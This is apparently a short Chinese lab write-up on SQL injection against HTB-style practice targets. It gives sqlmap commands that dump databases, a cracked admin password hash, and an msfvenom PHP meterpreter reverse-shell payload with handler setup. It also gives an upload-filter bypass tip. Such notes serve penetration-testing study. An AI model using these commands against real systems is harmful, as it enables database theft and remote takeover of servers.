sql注入之get
SQL注入简介:
nmap -A -T4 -v -p- -oX 140.xml 10.10.10.140
nikto -host 10.10.10.151
手动构造sql注入语句,没有成功
接下来要用web应用安全漏洞扫描器:
owasp-zap扫描网站是否存在注入漏洞和XSS漏洞,发现相关URL
sqlmap -u "http://10.10.10.151/cat.php?id=3" --dbs
利用sqlmap -u url 等等进一步探测
如:sqlmap -u url --dbs 扫描所有数据库
sqlmap -u url -D "数据库名" --tables 查看数据库下的数据表
sqlmap -u url -D “数据库” -T “数据表” -C “属性列表(逗号隔开)” --dump :获取指定数据
找到数据库密码后,可以尝试登陆后台管理系统,查找是否有upload文件漏洞
+-------+---------------------------------------------+
| login | password |
+-------+---------------------------------------------+
| admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) |
+-------+---------------------------------------------+
制作反射木马:msfvenom -p php/meterpreter/reverse_tcp lhost=IP lport=端口号 -f raw
并启动msfconsole中的exploit/multi/handler
set payload php/meterpreter/reverse_tcp
经验:如果不让直接上传php文件,可以尝试改为PHP后再上传
远程浏览刚上传的反射木马文件,启动meterpreter,开始进一步渗透